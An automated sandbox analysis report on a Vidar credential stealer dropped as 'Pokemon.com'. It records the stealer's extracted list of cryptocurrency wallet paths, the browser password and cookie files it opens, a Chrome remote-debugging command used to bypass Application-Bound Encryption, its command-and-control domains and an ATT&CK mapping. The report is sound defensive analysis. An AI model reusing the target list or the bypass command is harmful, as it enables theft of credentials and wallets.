                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\bookmarkbackups\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\db\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\security_state\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.dbJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                Source: Pokemon.comBinary or memory string: WIN_81
                Source: Pokemon.comBinary or memory string: WIN_XP
                Source: Pokemon.com.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Pokemon.comBinary or memory string: WIN_XPe
                Source: Pokemon.comBinary or memory string: WIN_VISTA
                Source: Pokemon.comBinary or memory string: WIN_7
                Source: Pokemon.comBinary or memory string: WIN_8
                Source: Yara matchFile source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Pokemon.com PID: 6468, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Attempt to bypass Chrome Application-Bound Encryption
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Yara detected Vidar stealer
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 12.2.Pokemon.com.4230000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.3073394194.0000000000D63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3073991340.0000000003F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439280630.0000000004234000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439391577.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439197434.0000000003F39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439480420.0000000003FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439435287.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000003.2439221836.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3076149953.0000000004231000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Pokemon.com PID: 6468, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00112263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00112263
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comCode function: 12_2_00111C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,12_2_00111C61

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts1
                Native API                		2
                Valid Accounts                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol4
                Data from Local System                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt1
                Registry Run Keys / Startup Folder                		1
                Extra Window Memory Injection                		2
                Obfuscated Files or Information                		Security Account Manager3
                File and Directory Discovery                		SMB/Windows Admin Shares21
                Input Capture                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		1
                DLL Side-Loading                		NTDS27
                System Information Discovery                		Distributed Component Object Model3
                Clipboard Data                		3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Extra Window Memory Injection                		LSA Secrets1
                Query Registry                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
                Process Injection                		111
                Masquerading                		Cached Domain Credentials221
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                Registry Run Keys / Startup Folder                		2
                Valid Accounts                		DCSync11
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                Virtualization/Sandbox Evasion                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581382 Sample: JA7cOAGHym.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 54 fa5lt.xyz 2->54 56 t.me 2->56 58 2 other IPs or domains 2->58 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 86 6 other signatures 2->86 10 JA7cOAGHym.exe 20 2->10         started        12 msedge.exe 2->12         started        signatures3 84 Performs DNS queries to domains with low reputation 54->84 process4 process5 14 cmd.exe 2 10->14         started        18 msedge.exe 12->18         started        21 msedge.exe 12->21         started        23 msedge.exe 12->23         started        dnsIp6 52 C:\Users\user\AppData\Local\...\Pokemon.com, PE32 14->52 dropped 98 Drops PE files with a suspicious file extension 14->98 25 Pokemon.com 29 14->25         started        29 cmd.exe 2 14->29         started        31 extrac32.exe 20 14->31         started        33 8 other processes 14->33 60 20.110.205.119, 443, 49943, 49995 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->60 62 20.189.173.1, 443, 49986, 50021 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->62 64 17 other IPs or domains 18->64 file7 signatures8 process9 dnsIp10 70 fa5lt.xyz 116.203.8.178, 443, 49766, 49772 HETZNER-ASDE Germany 25->70 72 t.me 149.154.167.99, 443, 49760 TELEGRAMRU United Kingdom 25->72 74 127.0.0.1 unknown unknown 25->74 90 Attempt to bypass Chrome Application-Bound Encryption 25->90 92 Found many strings related to Crypto-Wallets (likely being stolen) 25->92 94 Found API chain indicative of sandbox detection 25->94 96 4 other signatures 25->96 35 msedge.exe 25->35         started        38 chrome.exe 8 25->38         started        41 cmd.exe 25->41         started        signatures11 process12 dnsIp13 88 Monitors registry run keys for changes 35->88 43 msedge.exe 35->43         started        66 192.168.2.5, 443, 49703, 49704 unknown unknown 38->66 68 239.255.255.250 unknown Reserved 38->68 45 chrome.exe 38->45         started        48 conhost.exe 41->48         started        50 timeout.exe 41->50         started        signatures14 process15 dnsIp16 76 www.google.com 142.250.181.68, 443, 49814, 49815 GOOGLEUS United States 45->76

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                JA7cOAGHym.exe40%VirustotalBrowse
                JA7cOAGHym.exe29%ReversingLabsWin32.Trojan.Generic

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\208079\Pokemon.com0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://anglebug.com/7320$0%Avira URL Cloudsafe
                https://anglebug.com/7489$0%Avira URL Cloudsafe
                https://fa5lt.xyztosh;0%Avira URL Cloudsafe
                https://optimizatgoogs.cm/downlMIZATION0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.214.172
                		truefalse
                  		high
                  chrome.cloudflare-dns.com
                  		172.64.41.3
                  		truefalse
                    		high
                    t.me
                    		149.154.167.99
                    		truefalse
                      		high
                      fa5lt.xyz
                      		116.203.8.178
                      		truetrue
                        		unknown
                        ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                        		94.245.104.56
                        		truefalse
                          		high
                          sb.scorecardresearch.com
                          		18.161.69.117
                          		truefalse
                            		high
                            www.google.com
                            		142.250.181.68
                            		truefalse
                              		high
                              s-part-0035.t-0009.t-msedge.net
                              		13.107.246.63
                              		truefalse
                                		high
                                googlehosted.l.googleusercontent.com
                                		142.250.181.65
                                		truefalse
                                  		high
                                  clients2.googleusercontent.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    bzib.nelreports.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      assets.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        BjQpTJiVkzRqS.BjQpTJiVkzRqS
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          ntp.msn.com
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307255691&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                              		high
                                              https://assets.msn.com/statics/icons/favicon_newtabpage.pngfalse
                                                		high
                                                https://sb.scorecardresearch.com/b2?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                  		high
                                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307254838&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                    		high
                                                    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                      		high
                                                      https://steamcommunity.com/profiles/76561199809363512false
                                                        		high
                                                        https://t.me/k04aelfalse
                                                          		high
                                                          https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                            		high
                                                            https://sb.scorecardresearch.com/b?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                              		high

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://anglebug.com/7320$chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://anglebug.com/7489$chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://anglebug.com/4633chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
